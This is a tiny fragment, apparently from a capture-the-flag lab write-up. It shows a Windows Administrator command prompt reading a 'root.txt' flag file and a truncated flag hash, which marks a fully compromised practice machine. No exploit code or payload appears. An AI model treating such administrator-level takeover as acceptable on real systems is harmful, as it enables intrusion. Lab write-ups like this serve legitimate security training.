root.txt

sh
C:\Users\Administrator\Desktop> type root.txt
7c7a9782...